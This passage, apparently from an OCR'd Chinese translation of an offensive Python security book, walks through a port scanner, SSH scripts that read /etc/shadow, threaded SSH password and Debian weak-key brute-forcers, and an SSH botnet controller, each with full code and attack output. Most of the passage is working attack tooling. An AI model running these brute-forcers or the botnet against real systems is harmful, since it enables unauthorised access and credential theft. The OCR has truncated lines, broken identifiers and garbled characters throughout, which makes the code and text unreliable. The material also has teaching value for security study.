print('[+]%d/tcp open' % tgtPort) 
print('[+] ' + str(results)) 
except: 
screenLock.acquire() 
print('[-]%d/tcp closed' % tgtPort) 
finally: 
screenLock.release() 
connSkt.close() 


def portScan(tgtHost, tgtPorts): 


try: 
tgtIP = socket.gethostbyname(tgtHost ) 

except: 
print "[-] Cannot resolve '%s': Unknown host" %tgtHost 
return 

try: 


tgtName = socket.gethostbyaddr(tgtIP) 
print('\n[+] Scan Results for: ' + tgtName[0] ) 


except: 
print('\n[+] Scan Results for: ' + tgtIP) 
socket.setdefaulttimeout (1) 
for tgtPort in tgtPorts: 
print('Scanning port ' + str(tgtPort)) 
t = threading. Thread(target=connScan, args=(tgtHost, int(t¢ 
t.start() 


def main(): 
parser = optparse.OptionParser('usage %prog -H <target host> -| 
parser.add_option('-H', dest='tgtHost', type='string', help='sy 
parser.add_option('-p', dest='tgtPort', type='int', help='spec: 
(options, args) = parser.parse_args() 
tgtHost = options.tgtHost 
tgtPort = options.tgtPort 
args.append(tgtPort) 
if (tgtHost == None) | (tgtPort == None): 
print('[-] You must specify a target host and port[s]!') 


exit (0) 
portScan(tgtHost, args) 
if _name == ' main_': 
main() 
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运行 这 个 脚本 ， 我 们 将 看 到 一 下 结果 : 


attacker:!# python portScan.py -H 10.50.60.125 -p 21, 1720 
[+] Scan Results for: 10.50.60.125 

[+] 21/tcp open 

[+] 220- Welcome to this Xitami FTP server 

[-] 1720/tcp closed 
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我 们 前 面 的 例子 提供 了 一 个 快速 执行 TCP 扫 描 的 脚本 。 这 可 能 会 限制 我 们 执行 额外 
的 扫描 ， 如 ACK, RST, FIN, or SYN-ACK 等 Nmap 工 具 包 所 提供 的 扫描 。 它 实际 上 
是 一 个 标准 的 扫描 工具 包 ， 它 提供 了 相当 多 的 功能 ， 这 就 引出 了 问 了 ， 我 们 为 什么 
不 使 用 Nmap 工 具 包 了 ?进入 Python 监 站 美 妙 的 地 方 。 当 Fyodor Vaskovich 编 写 
Nmap 时 用 了 C 语 言 和 Lua 脚 本 。Nmap 能 够 被 相当 不 错 的 集成 到 Python 中 。Nmap 
产生 给 予 XML 的 输出 ，Steve Milner 和 Brian Bustin 编 写 了 Python 的 XML 解 析 库 。 
它 提供 了 我 们 用 Python 利 用 完整 功能 的 Nmap 的 能 力 。 


在 开始 之 前 ， 你 必须 安装 python-nmap 库 ， 你 能 从 
http://xael.org/norman/python/python-nmap/ 安装 python-nmap 库 。 确 保 你 安装 
时 对 应 了 不 同 的 Python2.X 或 者 Python3.X 版 本 。 


更 多 的 扫描 信息 


其 他 类 型 的 端口 扫描 
考虑 到 还 有 一 些 其 他 类 型 的 扫描 ， 虽 然 我 们 缺乏 用 TCP 选 项 制作 数据 包 的 工具 ， 但 
在 稍 后 的 第 五 章 中 将 会 涉及 到 。 那 是 看 你 能 能 添加 一 些 扫描 类 型 到 你 的 端口 扫 瞄 器 
中 。 
TCP SYN 扫描 : 又 称 为 半 开 放 扫 描 ， 这 种 类 型 的 扫描 发 送 一 个 SYN 的 TCP 连 接 数 包 等 待 响 
TCP NULL 扫描 : TCP 空 扫描 设置 TCP 的 标志 头 为 零 。 如 果 返 回 一 个 RST 数 据 包 则 表示 这 
TCP FIN 扫描 : TCP FIN 扫 描 发 送 一 个 FIN 数 据 包 ,主动 关闭 连接 ， 等 待 一 个 圆满 的 终 . 
TCP XMAS 扫描 : TCP XMAS 扫 描 设置 PSH，FIN, 和 URG TCP 标 志 位 ， 如 返回 RST 数 据 
[IE 
Python-nmap 库 安 装 后 ， 我 们 现在 可 以 导入 nmap 库 到 我 们 的 脚本 中 然后 用 我 们 
的 python 脚 本 运行 nmap 扫 描 ， 需 要 创建 一 个 PortScanner() 类 的 实例 才能 运行 
我 们 的 扫描 对 象 。 该 类 有 一 个 scan() 函数 ， 接 受 主 机 IP 地 址 和 端口 作为 输入 ， 然 


后 运行 基本 的 nmap 扫 描 。 此 外 ， 我 们 可 以 索引 扫描 结果 并 打印 端口 状态 。 以 下 为 
nmap 扫 描 脚 本 代码 : 





# coding=UTF-8 
import optparse 
import nmap 


def nmapScan(tgtHost, tgtPort): 
nmScan = nmap.PortScanner() 
results = nmScan.scan(tgtHost, tgtPort) 
state = results['scan'][tgtHost]['tcp'][int(tgtPort)]['state'] 
print(" [*] " + tgtHost + " tcp/" + tgtPort + " " + State) 
def main(): 
parser = optparse.OptionParser('usage %prog -H <target host> -I 
parser.add_option('-H', dest='tgtHost', type='string', help='s; 
parser.add_option('-p', dest='tgtPort', type='string', help='s; 
(options, args) = parser.parse_args() 
tgtHost = options. tgtHost 
tgtPort = options.tgtPort 
args.append(tgtPort) 
if (tgtHost == None) | (tgtPort == None): 
print('[-] You must specify a target host and port[s]!') 
exit(0) 
for tgport in args: 
nmapScan(tgtHost, tgport) 
if _name == '_ main_': 
main() 








运行 我 们 的 nmap 扫 描 脚 本 ， 我 们 可 以 看 到 nmap 多 种 方式 扫描 的 准确 结果 


attacker:!# python nmapScan.py -H 10.50.60.125 -p 21, 1720 
[*] 10.50.60.125 tcp/21 open 
[*] 10.50.60.125 tcp/1720 filtered 


构建 一 个 SSH 的 僵尸 网 络 


现在 ， 我 们 已 经 构建 了 一 个 端口 扫描 器 来 寻找 目标 ， 我 们 就 可 以 开始 利用 每 个 服务 
漏洞 的 任务 了 。 莫 里 斯 蠕虫 包含 了 常用 的 用 户 名 和 密码 ， 通 过 暴力 破解 来 远程 连接 
目标 的 Shell(RSH)， 将 其 作为 蠕虫 的 三 种 攻击 向 量 之 一 。1988 年 ，RSH 提供 了 一 
种 极 好 的 (虽然 不 安全 ) 方法 用 于 系统 管理 员 来 远程 连接 到 计算 机 并 控制 它 ， 从 而 
在 主机 上 执行 一 系列 的 终端 命令 。 安 全 的 shell(SSH) 协 议 已 经 取代 了 RSH 协议 ， 通 
过 接合 RSH 协议 与 公 角 密码 方案 来 确保 安全 。 然 而 ， 这 只 是 停止 了 少数 人 使 用 常用 
的 用 户 名 和 密码 的 暴力 破解 作为 攻击 向 量 。 


SSH 蠕虫 已 经 被 证 明 是 非常 成 功 的 和 常见 的 攻击 向 量 。 查 看 我 们 最 近 一 次 对 

www.violentpython.org 的 SSH 攻击 的 入 侵 检 测 (IDS) 日 志 。 在 这 ， 攻 击 者 试图 
用 UCLA( 加 利 福 尼 亚 大 学 洛杉矶 分 校 )， 牛 津 ，matrix 账户 连接 到 机 器 。 这 些 都 是 有 
趣 的 选择 。 幸 运 的 是 ，IDS 注意 到 攻击 者 的 IP 地 址 有 强制 制造 密码 的 趋势 后 阻止 了 
攻击 者 进一步 的 SSH 登陆 尝试 。 


Received From: violentPython->/var/log/auth.1og 

Rule: 5712 fired (level 10) -> "SSHD brute force trying to get acce 
Portion of the log(s): 

Oct 13 23:30:30 violentPython sshd[10956]: Invalid user ucla from ¢ 
Oct 13 23:30:29 violentPython sshd[10954]: Invalid user ucla from ¢ 
Oct 13 23:30:29 violentPython sshd[10952]: Invalid user oxford fror 
Oct 13 23:30:28 violentPython sshd[10950]: Invalid user oxford fror 
Oct 13 23:30:28 violentPython sshd[10948]: Invalid user oxford fror 
Oct 13 23:30:27 violentPython sshd[10946]: Invalid user matrix fror 
Oct 13 23:30:27 violentPython sshd[10944]: Invalid user matrix fror 


| 





` 


通过 Pexpect 与 SSH 进行 沟通 


( 注 : Pexpect Æ Don Libes 的 Expect 语言 的 一 个 Python 实现 ， 是 一 个 用 来 启动 
子 程序 ， 并 使 用 正则 表达 式 对 程序 输出 做 出 特定 响应 ， 以 此 实现 与 其 自动 交互 的 

Python 模块 。 Pexpect 的 使 用 范围 很 广 ， 可 以 用 来 实现 与 ssh、ftp、telnet 等 程序 
的 自动 交互 ; 可 以 用 来 自动 复制 软件 安装 包 并 在 不 同 机 器 自动 安装 ; 还 可 以 用 来 实 
现 软 件 测试 中 与 命令 行 交互 的 自动 化 ) 

让 我 们 实现 自己 的 自动 化 蠕虫 通过 暴力 破解 目标 的 用 户 赁 据 。 因 为 SSH 客户 端 需 

用 户 的 交互 ， 我 们 的 脚本 必须 等 待 和 匹配 期 望 的 输入 ， 在 发 送 进一步 的 输入 命令 之 
前 。 考 虑 一 下 以 下 的 情景 ， 为 了 连接 我 们 的 IP 地 址 为 127.0.0.1 的 SSH 机 器 ， 


首先 应 用 程序 要 求 我 们 确认 RSA 密 铀 ， 在 这 种 情况 下 ， 我 们 必须 回答 "yes" 才 能 继 
续 。 接 着 应 用 程序 要 求 我 们 输入 密码 。 最 后 ， 我 们 执行 我 们 的 命令 uname -a 来 确 
定 目标 机 器 的 运行 版 本 。 


attacker$ ssh root@127.0.0.1 

The authenticity of host '127.0.0.1 (127.0.0.1)' can't be establist 
RSA key fingerprint is 5b:bd:af:d6:0c:af:98:1c:1a:82:5c:fc:5c:39:a: 
Are you sure you want to continue connecting (yes/no)? yes 
Warning: Permanently added '127.0.0.1' (RSA) to the list of known 
hosts. 

Password : KEEKKKEKKKEKKEKESEK 

Last login: Mon Oct 17 23:56:26 2011 from localhost 

attacker:~ uname -v 

Darwin Kernel Version 11.2.0: Tue Aug 9 20:54:00 PDT 2011; 

root: xnu-1699.24.8~1/RELEASE_X86_64 


mn a 





为 了 实现 这 种 交互 式 的 控制 台 ， 我 们 将 充分 利用 名 为 Pexpect 的 第 三 方 Python 
模块 (可 以 到 http://pexpect.sourceforge.net 下 载 )。 Pexpect 有 和 程序 交互 的 能 
力 ， 并 寻找 预期 的 输出 ， 然 后 基于 预期 做 出 响应 ， 这 使 得 它 成 为 自动 暴力 破解 SSH 
用 户 赁 证 的 一 个 极 好 的 工具 。 


检查 connect () 函数 ， 这 个 函数 接收 用 户 名 ， 主 机 名 和 密码 ， 并 返回 一 个 SSH 连 
接 ， 从 而 得 到 大 量 的 SSH 连接 。 利 用 goes 模块 ， 并 等 待 一 个 预期 的 输 出 。 
有 三 个 预期 的 输出 会 出 现 --- 一 个 超时 ， 一 个 信息 en pe A 

钥 ， 或 者 是 一 个 密码 输入 提示 。 如 果 结 果 是 超时 ， session. ean OAR 函数 将 会 
返回 0 ， Salas 名 警告 这 个 并 在 返回 之 前 打印 一 个 错误 信息 

果 child.expect() 函数 捕 提 到 一 个 ssh_newkey 信息 ,他 将 返回 a 
函数 发 送 一 个 消息 "yes" 来 接受 这 个 新 key。 接 下 来 ， 函 数 在 发 送 密码 之 前 将 等 待 密 
码 提示 。 


import pexpect 
PROMPT = ['# = "Ss> ae Vs o ING '] 
def send_command(child, cmd): 
child.sendline(cmd) 
child.expect (PROMPT) 
print(child.before) 
def connect(user, host, password): 
ssh_newkey = 'Are you sure you want to continue connecting' 
connStr = 'ssh ' + user + '@' + host 
child = pexpect.spawn(connStr ) 
ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword 
if ret == 
print('[-] Error Connecting' ) 
return 
if ret == 1: 
child.sendline('yes' ) 
ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:']) 
if ret == 
print('[-] Error Connecting' ) 
return 
child.sendline(password) 
child.expect (PROMPT ) 
return child 


村 和 


一 旦 通过 认证 ， 现 在 我 们 可 以 使 用 一 个 单独 的 函数 commend() 发 送 命令 给 SSH 会 
话 。 commend() 函数 接受 一 个 SSH 会 话 和 命令 字符 串 作 为 输入 。 然 后 发 送 命令 字 
符 串 给 SSH 会 话 ， 等 待命 令 提示 。 捕 提 到 命 今 提 示 后 将 从 SSH 会 话 中 打印 输出 。 





import pexpect 

PROMPT = ['# ', '>>> ', '> ', '\$ '] 

def send_command(child, cmd): 
child.sendline(cmd) 
child.expect (PROMPT) 
print(child.before) 


将 一 切 包装 在 一 起 ， 现 在 我 们 有 了 一 个 能 连接 和 控制 SSH 会 话 交 互 的 脚本 了 。 


# coding=UTF-8 

__author__ = ‘dj' 

import pexpect 

PROMPT Sale yee ese Ne 

def send_command(child, cmd): 
child.sendline(cmd) 
child.expect (PROMPT ) 
print(child.before) 

def connect(user, host, password): 


ssh_newkey = 'Are you sure you want to continue connecting' 


connStr = 'ssh ' + user + '@' + host 
child = pexpect.spawn(connStr ) 
ret = child.expect([pexpect.TIMEOUT, ssh_newkey 
if ret == 0: 
print('[-] Error Connecting' ) 
return 
if ret == 
child.sendline('yes' ) 
ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:']) 
if ret == 
print('[-] Error Connecting' ) 
return 
child.sendline(password) 
child.expect (PROMPT) 
return child 


def main(): 
host = 'localhost' 
user = 'root' 
password = 'toor' 


child = connect(user, host, password) 

send_command(child, 'cat /etc/shadow | grep root') 
if _ name == ' main_': 

main() 


运行 这 个 脚本 。 我 们 可 以 看 到 我 们 可 以 连接 到 一 个 SSH 服务 器 ， 并 远程 控制 者 个 主 
机 。 我 们 通过 简单 的 命令 以 root 身份 读 取 /etc/shadow 文件 来 显示 哈 希 密码 ， 我 
么 可 以 使 用 这 个 工具 做 一 些 更 狐 独 的 事情 ， 比 如 说 用 wget 下 载 渗透 工具 。 你 可 
以 在 Backtrack 上 通过 生成 ssh-keys 来 启动 SSH 服务 。 尝 试 启动 SSH 服务 器 ， 


然后 用 这 个 脚本 区 连接 它 。 


attacker# ssh-kengen 

Generating public/private rsai key pair. 

<..SNIPPED. ,> 

attacker# service ssh start 

ssh start/running, process 4376 

attacker# python sshCommand. py 

cat /etc/shadow | grep root 

root : $6$ms32yIGN$NyxXjOYofkK14MpRwFHvXQWOyvUid . slJtgxHE2EuQqgD 
74S/GaGGs5VCngeC.bSOMZTF/EFS3uspQMNeepIAc. :15503:0:99999:7::: 


通过 Pxssh AJ ASSH 密码 


在 写 最 后 一 个 脚本 时 申 的 让 我 们 更 加 深入 的 了 解 了 pexpect 模块 的 能 力 ， 但 我 们 
可 以 简化 之 前 的 脚本 利用 pxssh 模块 。 Pxssh 是 Pexpect 模块 附带 的 脚本 ， 
它 可 以 直接 与 SSH 会 话 进行 交互 ， 通 过 预先 定义 

的 login() , logout() , prompt() 函数 。 使 用 pxssh 模块 ， 我 们 可 以 压缩 我 
们 之 前 的 代码 。 


import pxssh 

def send_command(s, cmd): 
s.sendline(cmd) 
s.prompt() 
print(s.before) 

def connect(host, user, password): 


try: 
s = pxssh.pxssh() 
s.login(host, user, password) 
return s 

except: 
print '[-] Error Connecting' 
exit(0) 


s = connect('127.0.0.1', 'root', 'toor') 
send_command(s, 'cat /etc/shadow | grep root') 


我 们 的 脚本 快要 完成 了 。 我 们 只 需要 对 我 们 的 脚本 稍 作 修改 就 能 暴力 破解 SSH 认 

证 。 除 了 增加 一 些 选 项 解析 主机 名 ， 用 户 名 和 密码 文件 ， 我 们 唯一 要 做 的 就 是 稍微 
修改 一 下 connect() 函数 。 如 果 login() 元 数 成 功 登 陆 没 有 蜡 常 的 话 ， 我 们 将 

打印 消息 提示 发 现 密码 ， 然 后 更 新 全 局 布尔 值 标识 。 否 则 ， 我 们 将 捕 扣 异常。 如果 
蜡 党 显示 密码 “refused”， 我 们 知道 密码 错误 ， 直 接 返 回 。 然 而 ， 如 果 蜡 常 显 

示 socket 套 接 字 “read_nonblocking”， 我 们 可 以 假设 这 个 SSH 服务 器 超过 了 最 

大 连接 数 ， 然 后 我 们 会 睡眠 几 秒 再 次 尝试 相同 的 密码 连接 。 此 外 ， 如 果 弄 常 显 

示 pxssh 难以 获得 命令 提示 符 ， 我 们 将 睡眠 一 会 使 它 能 获取 命令 提示 符 。 值 得 注 
意 的 是 我 们 包含 一 个 布尔 值 在 connect() 的 函数 参照 中 。 connect() HAT A 
递归 的 调用 其 他 的 connect() 函数 ， 我 们 希望 调用 者 可 以 释放 连接 锁 信 号 量 。 


# coding=UTF-8 

import pxssh 

import optparse 

import time 

import threading 

maxConnections = 5 

connection_lock = 

threading .BoundedSemaphore(value=maxConnections ) 

Found = False 

Fails = 0 

def connect(host, user, password, release): 
global Found, Fails 
try: 


s = pxssh.pxssh() 
s.login(host, user, password) 
print('[+] Password Found: ' + password) 
Found = True 
except Exception as e: 
if 'read_nonblocking' in str(e): 
Fails += 1 
time.sleep(5) 
connect(host, user, password, False) 
elif ‘synchronize with original prompt' in str(e): 
time.sleep(1) 
connect(host, user, password, False) 
finally: 
if release: 
connection_lock.release( ) 
def main(): 
parser = optparse.OptionParser('usage%prog '+'-H<target host> - 
parser.add_option('-H', dest='tgtHost', type='string', help='s; 
parser.add_option('-f', dest='passwdFile', type='string', help: 
parser.add_option('-u', dest='user', type='string', help='spec: 
(options, args) = parser.parse_args() 
host = options.tgtHost 
passwdFile = options.passwdFile 
user = options.user 


if host == None or passwdFile == None or user == None: 
print(parser.usage) 
exit (0) 


fn = open(passwdFile, 'r') 
for line in fn.readlines(): 
if Found: 
print "[*] Exiting: Password Found" 
exit(0) 
if Fails > 5: 
print "[!] Exiting: Too Many Socket Timeouts" 
exit(0) 
connection_lock.acquire() 
password = line.strip('\r').strip('\n') 
print("[-] Testing: " + str(password)) 
t = threading.Thread(target=connect, args=(host, user, pas: 
t.start() 
if _name == '_ main_': 
main() 


4 — y} 


尝试 用 SSH 密码 暴力 破解 器 破解 得 到 一 下 结果 。 这 很 有 趣 当 指 示 发 现 密码 

为 “alpine”， 这 是 iPhone 设备 的 默认 根 密码 。2009 年 末 ， 一 个 SSH 蠕虫 攻击 了 
iPhone。 通 常 越狱 的 iPhone 设备 ， 用 户 能 在 iPhone Lt OpenSSH 服务 。 而 这 
被 证 明 是 非常 有 效 的 对 于 一 些 没有 察觉 的 用 户 。 蠕 虫 iKeee 利用 这 个 新 问题 尝试 用 
默认 密码 攻击 设备 。 该 蠕虫 的 作者 无 意 用 这 个 蠕虫 做 任何 破坏 ， 但 是 他 们 更 改 
iphone 的 背景 图 片 为 Rick Astley 的 图 片 ， 并 附 上 一 句 话 “ikee never gonna give 
you up”. 





attacker# python sshBrute.py -H 10.10.1.36 -u root -F pass.txt 
[-] Testing: 123456789 

[-] Testing: password 

[-] Testing: 1234567 

[-] Testing: alpine 

[-] Testing: password1 

[-] Testing: soccer 

[-] Testing: anthony 

[-] Testing: friends 

[+] Password Found: alpine 
[-] Testing: butterfly 

[*] Exiting: Password Found 


i Wt 55 8 4A #1 SSH 


密码 提供 了 SSH 服务 的 一 种 验证 方式 ， 但 这 不 是 唯一 一 种 验证 方式 。 此 外 ，SSH 
还 提 过 了 另外 一 种 验证 方式 --- 公 钥 加 密 。 在 这 种 情况 下 ， 服 务 器 知道 公 钥 ， 用 户 知 
道 私 钥 。 使 用 RSA 或 者 DSA 加 密 算 法 ， 服 务 器 为 登陆 SSH 的 用 户 产 生 他 们 的 密 

钥 。 通 常 ， 这 提供 了 一 个 极 好 的 验证 方式 。 通 过 生成 1024 位 ，2048 位 或 者 4096 
位 的 密 钥 ， 使 我 们 很 难 用 弱 口 令 暴 力 破解 。 然 而 ， 在 2006 年 Debian Linu 的 发 行 版 
发 生 了 一 些 有 趣 的 事情 。 一 个 开发 者 评论 了 一 行 通过 代码 自动 分 析 工 具 找 到 的 代 
码 。 代 码 的 特定 行 保 证 SSH 密 钥 产生 的 烂 。 通 过 讲解 代码 的 特定 行 ， 密 钥 的 搜索 空 
间 的 减少 到 15 AE AR E15 位 炉 ， 这 就 意味 着 每 个 算法 只 存在 32767 个 密 钥 。 
HD Morre > CSO 和 Rapid7 的 总 设计 师 ， 生 成 了 1024 位 和 2048 位 的 所 有 的 密 钥 ， 
在 两 个 小 时 以 内 。 此 外 ， 他 使 这 些 密 钥 debian_ssh dsa 1024 x86.tar.bz2 可 
以 自行 下 载 。 你 可 以 先 下 载 1024 位 的 密 钥 ， 然 后 提取 密 钥 ， 删 除 公共 密 钥 ， 因 为 
只 需要 私人 密 钥 来 测试 连接 。 





attacker# bunzip2 debian_ ssh dsa 1024 x86.tar.bz2 
attacker# tar -xf debian_ ssh dsa 1024 x86.tar 
attacker# cd dsa/1024/ 

attacker# ls 
00005b35764e0b2401a9dcbca5b6b6b5 - 1390 
00005b35764e0b2401a9dcbca5b6b6b5 - 1390. pub 
00058ed68259e603986db2af4eca3d59 - 30286 
00058ed68259e603986db2af4eca3d59 - 30286. pub 
0008b2c4246b6d4acfd0b0778b76c353 -29645 
0008b2c4246b6d4acfd0b0778b76c353 -29645. pub 
000b168ba54c7c9c6523a22d9ebcad6f -18228 
<,.SNIPPED. ,> 

attacker# rm -rf dsa/1024/*.pub 








这 个 漏洞 持续 了 两 年 之 久 才 被 安全 人 员 发 现 。 因 此 ， 有 相当 多 的 脆弱 的 SSH 服务 
器 。 如 果 我 们 能 构建 一 个 工具 来 利用 这 个 漏洞 就 好 了 。 然 而 ， 为 了 访问 密 钥 空间 ， 
可 能 要 写 一 个 小 的 Python 脚本 来 暴力 遍历 32767 个 密 钥 为 了 验证 一 个 无 密码 ， 依 
赖 公 共 密 钥 的 SSH 服务 器 。 事 实 上 ，Warcat 小 组 写 过 这 样 的 脚本 ， 并 将 它 上 传 到 


了 milw0rm， 就 在 漏洞 被 发 现 的 当天 。Exploit-DB 存档 了 Warcat 小 组 的 脚本 ， 在 
http://www.exploit-db.com/exploits/5720/ 网 站 上 。 然 而， 我 们 将 编写 我 们 自己 的 脚 
本 ， 利 用 用 来 编写 密码 暴力 破解 的 的 pexcept 模块 。 


弱 密 钥 测 试 的 脚本 和 我 们 的 暴力 密码 认证 非常 相似 。 为 了 用 密 钥 认证 SSH， 我 们 需 
要 输入 ssh user@host -i keyfile -o PasswordAuthentication=no 。 在 下 面 
的 脚本 中 ， 我 们 循环 的 设置 已 生成 的 蜜 钥 来 尝试 连接 。 如 果 连 接 成 功 ， 我 们 将 打印 
密 钥 文件 的 名 字 在 屏幕 上 。 此 外 ， 我 们 将 设置 两 个 全 局 变量 Stop 

和 Fails ， Fails 将 用 于 统计 因为 远程 主机 关闭 连接 而 导致 的 连接 失败 的 数 

量 。 如 果 数 量 超过 5， 我 们 将 终止 脚本 。 如 果 我 们 的 扫描 触发 了 远程 I|PS( 入 侵 防御 
系统 ) 阻 止 我 们 的 连接 ， 那 么 就 没有 意义 继续 下 去 。 我 们 stop 全 局 变量 是 一 个 布 
尔 值 ， 告 诉 我 们 已 经 发 现 了 一 个 密 钥 ， main() 函数 也 没有 必要 再 开 居 新 的 连接 进 


程 。 


# coding=UTF-8 
import pexpect 
import optparse 
import os 
import threading 
maxConnections = 5 
connection_lock = 
threading .BoundedSemaphore(value=maxConnections ) 
Stop = False 
Fails = 0 
def connect(user, host, keyfile, release): 
global Stop, Fails 
try: 
perm_denied = 'Permission denied' 
ssh_newkey = 'Are you sure you want to continue' 
conn_closed = 'Connection closed by remote host' 
opt = ' -o PasswordAuthentication=no' 
connStr = ‘ssh ' + user + '@' + host + ' -i ' + keyfile + ( 
child = pexpect.spawn(connStr ) 
ret = child.expect([pexpect.TIMEOUT, perm_denied, 
ssh_newkey, conn_closed, '$', '#', ]) 
if ret == 2: 
print('[-] Adding Host to ~/.ssh/known_hosts' ) 
child.sendline('yes' ) 
connect(user, host, keyfile, False) 
elif ret == 3: 
print('[-] Connection Closed By Remote Host') 
Fails += 1 
elif ret > 3: 
print('[+] Success. ' + str(keyfile)) 
Stop = True 
finally: 
if release: 
connection_lock.release( ) 
def main(): 
parser = optparse.OptionParser('usage%prog -H <target host> -u 
parser.add_option('-H', dest='tgtHost', type='string', help='sy 


parser.add_option('-d', dest='passDir', type='string', help='sy 
parser.add_option('-u', dest='user', type='string', help='spec: 
(options, args) = parser.parse_args() 


host = 


passDir 


user = 
if host 


options.tgtHost 


= options.passDir 


options.user 


== None or passDir == None or user == None: 
print(parser.usage) 
exit(0) 
for filename in os.listdir(passDir): 
if Stop: 
print('[*] Exiting: Key Found.') 


exit(0) 


if Fails > 5: 

print('[!] Exiting: Too Many Connections Closed By 
Remote Host.') 

print('[!] Adjust number of simultaneous threads. ') 


exit(0) 


connection_lock.acquire( ) 
fullpath = 
print('[-] Testing keyfile ' + str(fullpath) ) 


os.path.join(passDir, filename) 


t = threading. Thread(target=connect, args=(user, host, ful: 
t.start() 
if _ name == ' main_': 
main() 


EE = 5 





测试 目标 主机 ， 我 们 能 看 到 我 们 获得 了 漏洞 系统 的 访问 权限 。 如 果 1024 位 的 密 负 
没 用 ， 党 试 下 载 2048 位 的 密 钥 ， 用 同样 的 方式 使 用 。 


attacker# python bruteKey.py -H 10.10.13.37 -u root -d dsa/1024 


[-] Testing 
[-] Testing 


Testing 
Testing 
Testing 


Testing 


.. SNIPPED. . 


] 
] 
] 
+] Success. 
] 
] 


Exiting: 


keyfile 
keyfile 
> 

keyfile 
keyfile 
keyfile 


tmp/002cc1e7910d61712c1aa07d4a609e7d-16764 
tmp/00360c749f33ebbf5a05defe803d816a-31361 


tmp/002dcb29411aac8087bcfde2b6d2d176-27637 
tmp/003e792d192912b4504c61ae7f3feb6f-30448 
tmp/003add04ad7a6de6cb1ac3608a7cc587-29168 


tmp/002dcb29411aac8087bcfde2b6d2d176-27637 


keyfile 


tmp/003796063673f0b7feac213b265753ea-13516 


Key Found. 


构建 SSH 的 僵尸 网 络 


现在 我 们 已 经 可 以 通过 SSH 控制 一 个 主机 ， 让 我 们 扩大 它 同时 控制 多 台 主 机 。 攻 击 
者 经 常 利用 一 系列 的 被 攻击 的 主机 来 进行 恶意 的 行动 。 我 们 称 这 是 僵尸 网 络 ， 因 为 
这 些 脆弱 的 电脑 的 行为 像 僵尸 一 样 执行 命令 。 为 了 构建 我 们 的 僵尸 网 络 ， 我 们 将 引 


入 一 个 新 的 概念 --- class ° class 的 概念 作为 面向 对 象 编程 的 基础 命名 。 在 这 
个 系统 中 ， 我 们 实例 化 与 方法 相关 联 的 对 象 。 为 了 我 们 的 僵尸 网 络 ， 每 个 僵尸 或 者 
客户 机 都 要 求 有 连接 和 发 送 命令 的 能 力 。 


# coding=UTF-8 
Import optparse 
import pxssh 
class Client: 
def _ init__(self, host, user, password): 
self.host = host 
self.user = user 
self.password = password 
self.session = self.connect() 
def connect(self): 
try: 
s = pxssh.pxssh() 
s.login(self.host, self.user, self.password) 
return s 
except Exception as e: 
print(e) 
print('[-] Error Connecting' ) 
def send_command(self, cmd): 
self .session.sendline(cmd) 
self .session.prompt() 
return self.session. before 


检查 代码 生成 的 类 对 象 Clinet() 。 为 了 建立 客户 机 ， 我 们 需要 主机 名 ， 用 户 名 ， 
密码 或 者 密 钥 。 此 外 ， 类 包含 的 方法 要 能 支持 一 个 客户 端 -- 

- connect() , sned_command() , alive() 。 注 意 ， 当 我 们 引入 一 个 变量 时 ， 它 
属于 类 ， 我 们 通过 self 来 引用 这 个 变量 。 为 了 构建 僵尸 网 络 ， 我 们 建立 了 一 个 

全 局 的 数组 名 字 为 botnet ,这 个 数组 包含 了 所 有 的 连接 对 象 。 接 下 来 ， 我 们 建立 

一 个 方法 ， 名 字 为 addClient() 接受 主机 名 ， 用 户 名 和 密码 为 参数 ， 实 例 化 一 个 
连接 对 象 然后 将 它 添加 到 botnet 数组 中 。 下 一 步 ， botnetCommand() 方法 接 

受命 令 参 数 ， 这 个 方法 遍历 数组 的 每 一 个 连接 ， 给 每 一 个 连接 的 客户 机 发 送 命令 。 


AR OEP A 


黑客 组 织 Anonymous， 通 常 采 用 自愿 的 僵尸 网 络 来 攻击 他 们 的 敌人 。 为 了 攻击 的 最 
大 限度 ， 这 个 还 可 组 织 要 求 他 们 的 成 员 下 载 一 个 名 为 LOIC 的 工具 。 作 为 一 个 集 
体 ， 这 个 黑客 组 织 的 成 员 发 动 一 个 分 布 式 的 僵尸 网 络 攻击 来 攻击 他 们 的 目标 。 虽 然 
是 非法 的 ，Anonymous 组 织 的 的 行为 已 经 取得 了 一 些 引 人 注意 的 和 到 得 上 的 胜利 
成 果 。 在 最 近 的 一 个 操作 中 ， 通 过 操作 黑暗 网 络 ，Anonymous 利用 自愿 的 僵尸 网 
络 海 没 了 致力 于 传播 儿童 情色 资源 的 网 络 主机 。 


# coding=UTF-8 
import optparse 
import pxssh 
class Client: 
def _init__(self, host, user, password): 
self.host = host 
self.user = user 
self.password = password 
self.session = self.connect() 
def connect(self): 
try: 
s = pxssh.pxssh() 
s.login(self.host, self.user, self.password) 
return s 
except Exception as e: 
print(e) 
print('[-] Error Connecting' ) 
def send_command(self, cmd): 
self.session.sendline(cmd) 
self.session.prompt() 
return self.session. before 
def botnetCommand(command) : 
for client in botNet: 
output = client.send_command(command) 
print('[*] Output from ' + client.host) 
print('[+] ' + output + '\n') 
def addClient(host, user, password): 
client = Client(host, user, password) 
botNet.append(client) 
botNet = [] 
addClient('10.10.10.110', 'root', 'toor') 
addClient('10.10.10.120', 'root', 'toor') 
addClient('10.10.10.130', 'root', 'toor') 
botnetCommand('uname -v') 
botnetCommand('cat /etc/issue') 


通过 包装 前 面 的 内 容 ， 我 们 得 到 了 我 们 最 后 的 僵尸 网 络 的 脚本 。 这 提供 了 一 个 极 好 
的 控制 大 量 主 机 的 方法 。 为 了 测试 ， 我 们 生成 了 3 台 Backtrack5 的 虚拟 主机 作为 目 
标 。 我 们 可 以 看 到 我 们 的 脚本 遍历 三 台 主 机 并 发 送 命令 给 每 个 受害 者 。SSH 僵尸 网 
络 的 生成 脚本 是 直接 攻击 服务 器 。 下 一 节 我 们 集中 在 间接 攻击 向 量 位 目标 ， 通 过 脆 
弱 的 服务 器 和 另 一 种 方法 建立 一 个 集体 感染 。 


通过 FTP 和 连接 WEB 来 渗透 


在 最 近 的 一 次 巨大 的 损害 中 ， 被 称 为 K985ytv 的 攻击 者 ， 使 用 匿名 和 盗用 的 FTP 和 赁 
证 ， 获 得 了 22400 个 域名 和 536000 被 感染 的 页 面 。 利 用 授权 访问 ， 攻 击 者 注入 
Javascript 代 码 ， 使 好 的 首页 重 定 向 到 乌克兰 境内 的 恶意 页 面 。 一 旦 受 感染 的 服务 


